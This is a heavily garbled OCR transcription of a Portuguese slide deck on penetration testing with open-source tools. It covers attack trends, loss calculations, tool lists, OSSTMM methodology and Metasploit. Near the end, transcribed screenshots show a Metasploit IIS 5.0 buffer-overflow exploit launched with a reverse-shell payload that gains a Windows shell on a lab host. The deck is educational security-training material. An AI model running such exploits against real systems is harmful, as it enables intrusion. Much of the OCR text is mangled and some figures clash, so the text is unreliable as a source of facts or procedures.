Skip to main content
Internet Archive's 25th Anniversary Logo

Full text of "Livros Executando Pentest Com Ferramentas De Código Aberto"

See other formats




YOUR INTELLIGENCE IN LINUX 
WWWwW.4LINUX.COM.BR 


YOUR INTELLIGENCE IN LINUX 
WWW.4LINUX.COM.BR 


Sandro Melo 
CSO 








- ¿Linux 






4 | (sandro@4linux.com.br) 


Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 2 


YOUR INTELLIGENCE IN LINUX 
WWW.4LINUX.COM.BR | 





Axzecutando Pan [DST 
voces ubiligenclo 
Perramentas de Codigo 
Ad Aberto e a Wetodoloyíz 
R 


(OSS TAVI) 


Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 3 


LINGUA l Nossa Agenda 



























destaque para o Penetration Test (PT) 

Definição de escopo de um Penetration Testing 
Tipos de Penetration Testing 

Tipos de Teste de Segurança 

Analise de Vulnerabilidades vs Penetratin Testing 
Ferramentas de Software Livre disponíveis 
Conceitos de Exploits 

A Ferramentas customizadas para instrusao de 

"Wi Sistemas 


Acronimos: 
AV - Analise de Vulnerabilidades 
PT - Penetration Testing 
DOS - Denial of Service 
DDOS - Distributed Denial of Service 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 4 


YOUR INTELLIGENCE IN LINUX Sum Tzu 
WWW.4LINUX.COM.BR 














“Se você conhece o inimigo e conhece asi mesmo, não 
precisa temer o resultado de cem batalhas. Se você se 
conhece mas não conhece o inimigo, para cada vitória 
ganha sofrerá também uma derrota. Se você não 
conhece nemo inimigo nem asi mesmo, perderá todas 
as batalhas...” 





| We xtraído da obra: " A Arte da Guerra" 





Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 5 


LINUX {Nossa Realidade 


O Brasil é o pais No 1 em ataques e atacantes. 





As empresas estão usando cada vez mais a internet 
para a realização de seus negócios. 





O valor da informação é o cerne do negócio. 






Ser administrador de sistemas ligados a internet 


Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 6 


D sata Sofisticacao das Técnicas 


Pent-test automatizados- , 
PERA CGIWEB - 


DOS /DDOS Exploits 


Rootkits 
Scanners de 


Vulnerabilidades 
— OverFlow/Worm 














Port Scanners 


Sniffers / IP Hijack 
Backdoors — 











Desativação de autidoria 
Vulnerabilidades conhecidas 


Código auto-replicados ROBERT 
Programas p/ cracking de senhas norris 


Adivinhação de senhas 1988 
1980 1985 1990 1995 2000 2002 2005 
Baixa 


Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 7 

















Alto 


A 





Nível de conhecimento 








ai 198 199 199 200 200 200 


21X > 





Prof. la Melo - DT com.br - http: ://meustte. ÍA com.br/sanaro/ - 8 
J 








Sofisticação das ferrametas 
Alto 

















198 198 199 199 200 200 200 
Pa lx : 


m 2 9 
Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 9 









LB LIINUX TI - Negócios 


WWW.4LINUX.COM.BR 


Até onde o investimento de TI representa vantagem 
estratégica em relação a sua concorrência”? 


Se o seu investimento na área de TI fosse comprometido, 
até onde isso refletiria em seu negócio? 


Como mensurar ou mesmo quantificar o valor de um 
NS possível prejuizo relacionado a um ataque de cracker ou 
ON | ScriptKiddies a estrutura de TI de sua empresa? 





Diante desses cenarios devemos investir em Seguranca de 
TI? 
í 0 





Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 10 








£ 
- e 


e E os 
Mensurar a importância de investimento em segurança pode ser 


dificil. Mas mensurar o valor de prejuízos causados por um 
servidor estratégico que foi invadido, não o é. Podemos com 
certeza afirmar que pode deixar qualquer um de cabelo em pé!!! 





<p LINUX 


YOUR INTELLIGENCE IN LINUX 
WWW.4LINUX.COM.BR 


Tenteancdo 
mens 
impncesro cle urna 
Ilnyasio 







































































Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 12 





LD LIN U 


YOUR INTELLIGENCE IN LINUX 
WWW.4LINUX.COM.BR 











“Imagine uma o corporação com um grande 
investimento de tempo e dinheiro em uma 
estrutura de Internet, tendo servidores DNS, 
Servidores de Correio, Servidores Web, ligação 
com sua filial através de VPN e tudo uma cultura 
já assumida dentro desse cenário” 





® iP válido 
e NAT 


O IP Inválido 













i <a> 
= 





Linux 
Firewall 
IDS 
Proxy 
Gateway 


Lisi Linux 


: . Firewall 
Firewall Pia ee HIDS 
NIDS 


R . Servidor de 
HIDS Ea E Correio 


Proxy Anti-Vírus 
Gateway ome DNS Webmail 


Linux E Linux 
Firewall = VPN 
IDS = Firewall 
Servidor Į: NIDS 
Netsaint |: HIDS 
= Proxy 
Gateway 


Rede Periferica 











q pr Wt wi {DI mamaaa US i «on 


SWITCH/HUB 








= tm 10 IIA cam 


= DA ŘŮ 


~ SWITCH 





a ONO OOo " = seo = as os AAA AA 
J o Esta£0es 

= Ooo a z Linux / Windows = 
u Esta£0es = Linux Linux : n 
: Uini E Linux / Windows : > Servidor de} | Servidor de | = . : 
= Linux Linux x na Arquivos ImpressPiso | = = w Em - 
z E : Servidor n E m | | = 
= | Servidor de Servidor de DHCP = no . E — = 
=: | Arquivos ImpressPiso ranet a EE E E JE : E =. 8 Ma: E 
: : Ee O O: 


DLINUX À Cálculando o Impacto 


WWW.4LINUX.COM.BR 





Suponhamos que essa estrutura venha a ser prejudicada 
parcialmente ou mesmo integralmente por atividades de 
invasores (Crackers, Insiders, Scripkiddies) 

Podemos mensurar o valor de um possível prejuizo 
através de algumas técnicas, vide a seguir: 


SLE (Single Loss Expectancy) - que consistem em 
mensurar em termos financeiros o o impacto de um 
Y incidente. 

| YALE (Annualized Loss Expectancy) - Esta formula 

- consiste em equacionar a SLE, e o número de eventos 
ocorridos em um determinado periodo de tempo. 









Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 15 


pla And | Cálculando o Impacto 


Imagine o custo dessa estrutura que foi implementada ao 
longo de um ano por uma equipe de cinco pessoas que 
utilizavam cento e sessenta horas por mês. Com um salário de 
RS 3.000,00 para cada um, estimamos um custo/ora na casa 
dos RS 20,00 (acrescidos encargos, benefícios e outros). 





Uma vulnerabilidade no servidor principal deste sistema, 
Ny explorada por ameaças internas ou externas ( insiders - 
— Wfuncionário insatisfeito, crackers ou ScriptKiddies) poderiam 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 16 


em qa dd Cálculando o o Impacto 


WWW. 4LINUX.COM.BR 





Neste cenário o prejuizo deste sistema pode ser 
calculado da seguinte forma: 


8 (horasflia) x 240 (dias Ano) x 5 (número de 
pessoas) = 9.600 horas 


RS 20,00 (custo hora) x 9.600 (horas) = R$192.000,00 


Prejuizo total de RS 192.000,00 => 100%. 








Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 17 


TONES Cálculando o Impacto 


WWW. 4LINUX. COM.BR 





Ainda neste cenário imagine essa empresa com 500 
funcionários, onde 75% possuem acesso a rede. 


Cada um destes 375 tem seu trabalho prejudicado 
devido a problema ou mesmo inoperância de algum 
componente da Infra mencionada totalizando em 
torno de 1 hora semanal. 


xi Com um valor hora na faixa de RS 10,00 ficamos 
- com um prejuizo acumulado de, aplicando a formula 
do ALE: 








Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 18 


WWW. 4LINUX.COM.BR 





Prejuízo mensurável pontual : 
379 (funcionários) x 1 (hora por semana) (semanas) 
= 375,00 horas 


RS 10,00 (custo hora) x 375,00 (horas) = 
R$3,750,00 (por dia) 

375 (funcionári arios) x 1 (hora por semana) x 44 
(semanas) = 16.500 horas 


RS 10,00 (custo hora) x 16.500 (horas) = 
RS165.000,00 (em 1 ano) 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 19 


TONES | Evitandoo problema! 











Uma forma de evitar que a infra 
seja prejudicada por ataques é 
em TESTAR sua segurança VOCE 
"WA MESMO!!! 












Prof. Sandro Melo - sandro@4linux.com.6r - http://meusite.mackenzie.com.br/sandro/ - 20 


YOUR INTELLIGENCE IN LINUX 
WWW.4LINUX.COM.BR | 


Conceltuznelo 
técnica de 
¡Pemstest 











Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 21 


A realização de PEN-TEST torna-se um mecanismo 
importante para avaliar de forma qualitativa e até 
mesmo quantitativa os problemas de seguranca que 


possam existir. 






X qm Deve ser utilizando dentro de um planejamento de 
— Nsegurança bem definido e com metodologia concisa. 





Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 22 


D LIN UX t Ambientes p/ um Pen-test 





Tipos de ambientes p/ Pen-test 


Wireless Lan 
Topologia de redes periféricas (DMZ) 
Data Center com acesso a Internet 
Portais 
Extranet 
~< Intranet 
~ Ņ\ Pontos de Accesso via VPN 
' | Pontos de conexao Dial-up 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 23 


D LOIN O X i PEN-TEST vs. Analise 12 


Análise de Vulnerabilidades (AV) 





No caso de um teste de Analise de 
Vulnerabilidade o Consultor tem fazer a 
varreduras para os vulnerabilities no usuário 
ou a aplicação e para filtrar para fora os 
positivos falsos da varredura output traçando 
os com os vulnerabilities reais associados com 
o anfitrião do alvo. 


A partir de Scanners Customizados, mas com 
objetivo de identificar os problemas mas não 
com o objetivo intrusivo 





Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 24 





DLINU: x PEN-TEST vs. Analise 22 


Usando ferramentas customizadas como NESSUS (GPL), 
ISS SCAN (Proprietária), Retina (Proprietária), seria 
fazer um PEN-TEST? 





Obs.: Uma Análise de Vulnerabilidades é diferente de 
PEN-TEST! A Analise de Vulnerabilidade é uma dos 
técnicas de Teste de Segurança que um CSO ou SO pode 
utilizar como recurso em seus projeto de seguranca. 






WAtualmente o Pen-Test pode ser conceituando também 





Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 25 


Conceitualmente o PEN-TEST também pode se definido 
como é uma técnica que podemos utilizar para realização 
de teste de segurança. Inumeramos a seguir outras 
Network Scanning (Varreduras) 

Vulnerability Scanning ( A.de Vulnerabilides) 
Password Cracking (Bruteforce) 

Log Review (Analise de logs) 

NNW Intregrity Ckeckers (Analise de Intergridade) 

— \Mitm Test (Analise a partir da LAN) 

- War Dialing (teste em sistema com dial-up) 

War Driving (Teste em sistema Wireless LAN) 
Rootkit Detection (Detecção de vírus / trojans) 








Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 26 


SD LINUX t Ferramental 28 












AD LINUX ( Ferramental 18 


| Software Livre que esta 
diretamente vinculado à verdadeira cultura 
Hacker de liberdade do conhecimento 
encontramos um número MUITO GRANDE de 
códigos das mais variadas ferramentas que 
podem ser usadas para Testes de Segurança. 
Network Scanners: 
YA - Nmap; 
= Hping3; 

* Unicornscan; 
canners Vulnerabilidades: 
- Nessus; 
- Sussen; 
- Nikto.pl; 


Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 27 


Password Crack (Bruteforce): 
- John the Ripper ou Crack; 

- Hydra; 

- Brutus.pl; 

Intregrity Ckeckers: 

- Aide; 

- Tripwire; 

- Osiris; 

UN Mitm Test (Sniffers / Arpspoofing, IP Hijack): 
— W-Ettercap; 

- Ethereal; 

- Dsniff; 

- Vnccrack; 





Prof. Sandro Melo - sandro@4linux.com.6r - http://meusite.mackenzie.com.br/sandro/ - 28 


AD LIN U t Ferramental 38 


War Dialing: 
- THC-Dialup Login Hacker (UNIX); 


War Driving (Teste em sistema Wireless LAN): 
- Airsnort; 

- Kismet; 

- Wepcrack; 


Y Rootkits, Trojans, Virus and Worn Detection: 
— W-chkrootkit; 
- Rkdet; 








AD LIN U ( Ferramental 38 


Pen-test - Exploits Customizados 

- Framework MetaSploit (aprox. 32 testes); 

- Remote Access Session (aprox. 69 testes - old); 
- Neat (aprox. 30 testes 


Disto CD-Live; 
— Knoppix STD; 
we -XPL Morpheio; 
— N- PHLAK; 

- PlanB; 

- Auditor; 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 


DLINUX Ù Técnicas p/ Pen-Test 


Usando o conceito atual de Pen-test combinando as 
demais técnicas de teste de segurança, o “Pentester’ 
normalmente irá executá-las na seguinte ordem: 


Inciara com o Footprinting: 
Levantamento de informaçõe básicas 
Teste de Engenharia Social 

Utilização das Técnicas de Fingerprinting 


| ) q Levantamento e mapeamento da Rede Alvo: 
NUtilização de técnicas Ports Scanning 
Enumeração de informações dos serviços 
encontrados 

Avaliação de Políticas de Firewall 
Utilização de Scanners de Vulnerabilidades 


Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 31 


LINUX T Técnicas p/ Pen-Test 








Técnicas Intrusivas: 


Exploração de vulnerabilidades conhecidas nos 
serviços identificados. 

Exploração de Vulnerabilidades em aplicações 
Web. 

Técnicas de Bruteforce p/ serviços e Cracking de 
WE Senhas. 

— WTeste de Negação de Servico (DOS). 

Escalação de Privilégio. 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 32 


D LINUX ( Fluxograma Pen-test 











Planejamento_____, Levantamento __ „p Ataque 


de escopo de dados 
































Laudo Técnico 

















Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 33 


LINUX $ Fluxograma Pen-test 
Planejamento | | 
















































































de escopo Levantamento Tentativas de 
de dados ganho de acesso 
Varreduras 
Análise de 
Vulnerabilidade Escalside 
| Privilégio 
ou acesso 
- nivel de 
Sugestao de Administrador 




















Correcoes | 


Flaboracao do 
Laudo 




















Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 34 


em qa dd hes t Pen-test - Caixa Preta 


Black Box Penetration Testing 


O Analista (Pen-tester) não receber 
informações do ambiente remoto a ser 
testado, salvo informaçoes básicas como o 
| IP Address e o nome da empresa. Ou seja, 
“totalmente as escura é iniciado o processo 
- ide Pen-test. 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 35 


LD LINUX Pen-test - Caixa Branca 


White Box Penetration Testing 


O Analista (Pen tester) inicia sua 
atividade tendo informações do 
ambiente como : 


Tipo de serviço de redes; 

A Detalhes sobre versoes e aplicações; 
NN Informações sobre Sistema; 
Operacionais a serem testados; 
Firewall e IDS implementados; 
Bancos de dados utilizados. 








Prof. Sandro Melo - sandro@4linux.com.6r - http://meusite.mackenzie.com.br/sandro/ - 36 


em qa dd has \Pen-test nao Instrusivo 


“Levantamento de Dados | 





Analise de Vulnerabilidades 


Identificação de possiveis 
vulnerabilidades encontradas 


Limitase apenas a correlação de 
JA “exploit”apropriados para exploração das 
Wi vulnerabilidades identificas. 


Não é realizado teste para identificação 
de possibilidades de Negação de Serviço 
(DOS) 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 37 


Penetration Test — Não Instrusivo 
I= m > Teste de Engenharia. Social | 
y 


Uso de técnicas de 
Fingerprinting e 
Footprinting 








Sondagem da Rede Avaliando Políticas de Firewall 


Analisando Logs e 
gerando Relatório 


j 


Uso de técnicas de 
PortScanning e final com as 
Enumeração Serviços Recomendações & 
ciclos de trabalhos a 


Scanners de serem adotados 


Vulnerabilidade =o 


| Serviços de Rede É 
Correlação de f - ---- 
Vulnerabilidades | Aplicações Web 


conhecidas 























| 

| 

sl 

Apenas correlacao l 
| 

| 


Cracking de Senhas / CL ooo oc] 
Brute Force de Serviços 


LINUX 1 Pen-test Instrusivo 





Levantamento de Dados 
Analise de Vulnerabilidades 


Identificação de possiveis 
vulnerabilidades encontradas 


Correlação de “exploit”apropriados para 
WE exploração das vulnerabilidades 

— Videntificadas, e sua utilização para 
ganhar de acesso. 


Identificação de possibilidades de 
Negação de Serviço (DOS) 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 39 


Penetration Test — Instrusivo 
I= m > Teste de Engenharia. Social | 


Ý 
Uso de técnicas de 
Fingerprinting e 
Footprinting 


Sondagem da Rede j Avaliando Políticas de Firewall 








Analisando Logs e 
Uso de técnicas de gerando Relatório 
PortScanning e final com as 
Enumeração Serviços Recomendações & 
ciclos de trabalhos a 


Scanners de serem adotados 


Vulnerabilidade = == 
Exploração de Servicos de Rede i 
Vulnerabilidades Aplicações Web 
conhecidas 





















ra é dps / Escala de Privilégio 
ee ee ee (Ganhando Acesso a Shell) 


Teste de Negação de Serviço L = = = = = ee J 
(DOS) 


AN | Resultado Desejado! 


Após a: a realização de todos as é desej que 
o Pen-tester reuna todos os dados levantados, dados 
como: 





- Sistemas operacionais dos servidores da rede alvo; 
- Serviços de redes, versões e possível 
vulnerabilidades; 
- Possibilidades de ataques de Bruteforce; 
_- Dados de usuários enumerados como senhas e “id”; 
~- Possibilidades de Denial of Services; 
— - Possibilidades de acesso remotos arbitrários; 

"+ Qualificando cada problema identificado a partir 
de referência de grau de risco; 
- - Sugerir correções para as vulnerabilidades 
identificadas. 











Wletocloloviz 
E Práticas 









Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 42 


LINUX T METODOLOGIA 








Normas tem por objetivo definir regras claras e boas práticas 
para realizações de processos, são construidas reunindo 
experiências de vários profissionais. 


Para realização de Pen-test temos disponível a norma 
OSSTMM e OSSIMM Wireless desenvolvido inicialmente por 
Peter Herzog da ISECOM, hoje contando com vários 


especialistas em segurança como colaboradores. Disponível 
para download em www.isecom.org. 


| \OBS.; Outro documento interessante seria: Guideline Network 
Security Testing elaborado pelo NIST-USA, disponível em 


WWW.Csrc.nist.gov 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 43 


LD LIINUX t OSSTMM 





A Norma organiza todas técnicas de Teste de 
Segurança usadas em conjunto para 
elaboração de Pen-test, organizando em 6 
tópicos macros: 


- Information Security 

- Process Security (Engenharia Social) 
- Internet Techonology Security 

- Communications Security 





— . Wireless Security 
- Physical Security 





Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 44 


YOUR INTELLIGENCE IN LINUX 
WWW.4LINUX.COM.BR | 


Conhecendo 


WletaSoloit 
Herne yoele 




































































Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 45 


TONES l MetaSploit Framework 


O Metasploit Framework é uma plataforma 
avançada de Código Aberto para Pen-test. O 
projeto começou inicialmente com objetivo de 
ser um ferramenta poderosa, customizada 
para testar a segurança de serviços de Redes. 

É um projeto novo que necessita de 
colaboradores. Sendo relevante lembrar que 
N ferramentas equivalentes como CANVAS e 
CORE IMPACT são extremamente caras! 


Site do projeto: www.metasploit.com 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 46 


em a dd ha MetaSploit Framework 


Escrito em Perl, inclui os vários componentes 
escritos em C, em Assembler e em Python. 


O suporte a linguagem Perl permite que 
funcione em vários sistemas Unix-like e 
também em ambiente Cygwin. 


me O Core do projeto é duplo-licenciado sob as 
—N licencas  GPLv2 e Perl Artistic Licenses, 
permitindo que seja usado em projeto de 
Códigos Abertos como também Projetos 
Comerciais. 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 47 


YOUR INTELLIGENCE IN LINUX 
WWW.4LINUX.COM.BR 


Thustenacdo un 
Pen-tost COLON 


Wletasolois 
Meme sy ori 



















































































Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 48 


#:) MetasploliFPramework Web Console v2.0- konqueror 
Location Edit View Go Bookmarks Tools Settings Window Help 
de ~ G J E e — 


ES Location: || me http127.0.0.1:55555/ 


Metasploit v2.0 Exploit Index 


Apache Win32 Chunked Encoding 
Blackice/RealSecure/Other ISS ICQ Parser Buffer Owerflow 
Exchange 2000 MSOS-46 Heap Overflow 
Frontpage fp5SOreg.dIl Chunked Encoding 
IA WebMail 3.x Buffer Overflow 

IIS 5.0 Printer Buffer Overflowy 

IIS 5.0 WebDAV ntdll.dll Owerflow 

IIS 5.0 nsiislog.dll POST Overflow 

IMail LDAP Service Buffer Overflow 
MSSOL 2000 Resolution Overflow 
Microsoft RPC DCOM MSOS-026 

PoPToP Negative Read Overflowy 
RealServer Describe Buffer Owerflow 
Samba trans2open Overflow 

Sambar 6 Search Results Buffer Overflow 
Serv-U FTPD MDTM Overflow 

Solaris sadmind Command Execution 
Universal Plug N Play Overflowv 
War-FTPD 1.65 PASS Overflow 








sj Metasploit Framework Web Console v2.0- Konqueror 


Location Edit View Go Bookmarks Tools Settings window Help 


Qaa QO AAA ADA 


E> Location: || as http 27.0.0.1:55555/MODE=SUMMARY&MODULE=|IS 5.0 Printer Buffer Overflow 
Module: IIS 5.0 Printer Buffer Overflow 


Mame: IIS 5,0 Printer Buffer Overflow 
Wersion: $Revision: 1.18 $ 
Authors: HO Moore <hdm [at] metasploit.com> [Artistic License] 


This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS, 


This module works against Windows 2000 service pack O and 1. If the service stops responding after a 
successful compromise, run the exploit a couple more times to completely kill the hung process, 


* http: / /www.osvdb.org/548 
* http: / /www.microsoft.com/technet/security/bulletin/MSO1-023.mspx 
« http://lists.insecure.org/lists/bugtrag/2001/May/0011.html 


Select Payload 


Exploit Listing | Metasploit.com 


æ Page loaded. CE 


hambB=lashe: í m&fweb -wv 
[*] Starti rp 2,0 Web Interface on 
127,0, O EA SUMMARY TIS 5,0 Printer Euffer 


E 


eE 





so Metasploit Framework Web Console v2.0 - Konquerol 


Location Edit View Go Bookmarks Tools Settings window Help 


QQA0 0G MAA AO 


E> Location: || a ITFUNC=sehgoPT LHOST=192.168.1.724480PT LPORT=999980PT TARGET=08Exploitáction=Launch+Exploit 


Processing exploit request (IIS 5.0 nstislog.dll POST Overflow)... 
Using payload: winreverse 


[Wed Apr 7 23:30:34 2004] ¡¡s50_nsiislog_post EXPLOIT 192.168.1.214 
C] Starting Reverse Handler. 

[“] Attempting to exploit target Windows 2000 Pre-MS03-019 

C] Sending 65919 bytes to remote host. 

C] Waiting for a response... 

C] Got connection from 192.168.1.214:1093 

C] Proxy shell started on 192.168.1.244:33770 


#) Shell- Konsole 
Session Edit view Bookmarks Settings Help 


hdm@slasher I telnet 192,166,1,244 sar 
Trying 192,168,1,2d44, 

Connected to 192, 16s. 1. dd, 

Escape character is E 


Metasploit Web Inter 


Microsoft Windows 2000 [version 
{Co} Copyright 1965-1999 Microsoft Corp, 


E nee as dar 
— + Ll LI +o am | 


EC: AUTHHTS=uy=tem3e2>[] 


| Shell | 


[a 


| PORT=80 


EXPLOIT IIS 5,0 neiisloe,d11 POST Overflow PAYLOAD=winrewer=e HOST=192.168.1.214 EN 
EXPLOIT IIS 5,0 nsiislog.dll POST Overflow PAYLOAD=winreverse HOST=192,168,1,214 | E 
+ 


= 





AG LIN U XK Sun Tzu 


YOUR INTELLIGENCE IN LINUX 
WWW.4 LINUX.COM.BR 


“Na paz, preparar-se para a guerra; na guerra, preparar-se 
para paz. A arte da guerra é de importância vital para o 
Estado. Uma questão de vida ou morte, um caminho tanto 
para a segurança como para a ruína. Assim, em nenhuma 
circunstância deve ser descuidada...” 


Y Extraído da obra: "A Arte da Guerra" - Sun Tzu 








Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 52 





DLINUX f Bibliografia 





ISO NBR 17799 

«Manpage do Nmap 

«Norma OSSTMM e OSSTMM Wireless -www.isecom.br 
* Www.axur.com.br 

e www.metasploit.com 

* WWW.nessus.org 

ewww.ussback.com 

*ICMP usase in Scanning - Ofir Arkin 
(www.sys-security.com) 

eX remote ICMP based OS fingerprinting techniques - Ofir 
Arkin e Fyodor Yarochkin 

(www.sys-security.com). 


Copia dessa palestra: 
http://meusite.mackenzie.com.br/sandro 


Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 54 





LB LINA Meu Livro 


WWW.4LINUX.COM.BR 






Exploração de Vulnerabilidades em Redes TCP/IP foi idealizado 
penta para suprir as necessidades dos administradores dos novos 
| eee tempos. No passado, era comum instalarmos um servidor e 
EXPIORACAO DE simplesmente esquecermos dele, pois o acesso era exclusivo da 
ll LAN da corporação. Com o advento da Internet tudo mudou; uma 
VULNERABILIDADE vez na Internet, seu servidor está ao alcance do mundo. 


Administradores de sistemas que buscam conhecimentos em 
segurança de redes irão encontrar sólidas informações sobre 
técnicas utilizadas por invasores, sejam eles: 


e Atacantes externos, como Crackers e Script Kiddies 
e Atacantes internos, como Insiders 
“Pseudo-consultores conhecidos como Gray Hats 


Entre as técnicas abordadas, podemos destacar: Fingerprint, 
Footprint, Varreduras, Negação de Serviço, Bruteforce de 
Serviços e Ataques Internos. Além dessas, tambérm são abordadas 
técnicas utilizadas em Sistema Operacional “Like Unix”, tendo o 
Linux como referência. 


Informaçoes na url: 


http://www.temporeal.com.br/produtos.php?id= 168767 


Prof. Sandro Melo - sandro@4linux.com.6r - http://meusite.mackenzie.com.br/sandro/ - 55